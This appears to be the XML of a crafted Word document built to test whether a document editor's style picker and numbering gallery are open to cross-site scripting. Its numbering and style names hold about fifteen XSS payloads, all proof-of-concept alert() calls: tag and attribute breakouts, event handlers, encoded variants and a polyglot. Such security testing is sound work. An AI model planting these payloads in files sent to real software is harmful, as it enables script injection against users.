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XSS PAYLOAD TEST DOCUMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This document contains 15+ different XSS payloads in style and numbering names.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Open the style picker or numbering gallery to test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>PAYLOADS INCLUDED:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- Tag Breaking (closes div/span/td)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- Attribute Breaking (quote escapes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- Event Handlers (img, svg, body, input, details)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- No-Space Variants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- HTML Entity Encoded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- Polyglot (multi-context)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>If ANY alert pops up, the software is vulnerable.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:abstractNum w:abstractNumId="0">
    <w:nsid w:val="00000000"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:name w:val="&lt;/div&gt;&lt;script&gt;alert('TAG-BREAK-1')&lt;/script&gt;&lt;div&gt;"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="00000001"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:name w:val="&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;script&gt;alert('TAG-BREAK-2')&lt;/script&gt;"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="2">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="00000002"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:name w:val="&quot;&gt;&lt;script&gt;alert('ATTR-BREAK-1')&lt;/script&gt;&lt;input value=&quot;"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="3">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="00000003"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:name w:val="'&gt;&lt;script&gt;alert('ATTR-BREAK-2')&lt;/script&gt;&lt;div x='"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="4">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="00000004"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:name w:val="&lt;img src=x onerror=alert('IMG-ERROR')&gt;"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4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agBreak1">
    <w:name w:val="&lt;/div&gt;&lt;script&gt;alert('TAG-BREAK-1')&lt;/script&gt;&lt;div&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TagBreak2">
    <w:name w:val="&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;script&gt;alert('TAG-BREAK-2')&lt;/script&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AttrBreak1">
    <w:name w:val="&quot;&gt;&lt;script&gt;alert('ATTR-BREAK-1')&lt;/script&gt;&lt;input value=&quot;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AttrBreak2">
    <w:name w:val="'&gt;&lt;script&gt;alert('ATTR-BREAK-2')&lt;/script&gt;&lt;div x='"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ImgError">
    <w:name w:val="&lt;img src=x onerror=alert('IMG-ERROR')&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="SvgLoad">
    <w:name w:val="&lt;svg onload=alert('SVG-LOAD')&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="SvgScript">
    <w:name w:val="&lt;svg&gt;&lt;script&gt;alert('SVG-SCRIPT')&lt;/script&gt;&lt;/svg&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyLoad">
    <w:name w:val="&lt;body onload=alert('BODY-LOAD')&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="InputFocus">
    <w:name w:val="&lt;input onfocus=alert('INPUT-FOCUS') autofocus&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DetailsToggle">
    <w:name w:val="&lt;details open ontoggle=alert('DETAILS-TOGGLE')&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpaces">
    <w:name w:val="&lt;img/src=x/onerror=alert('NO-SPACES')&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoQuotes">
    <w:name w:val="&lt;img src=x onerror=alert(String.fromCharCode(78,79,81,85,79,84,69,83))&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HtmlEntity">
    <w:name w:val="&lt;img src=x onerror=&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;('ENCODED')&gt;"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Template">
    <w:name w:val="${alert('TEMPLATE')}"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Polyglot">
    <w:name w:val="'&quot;&gt;&lt;img src=x onerror=alert('POLYGLOT')&gt;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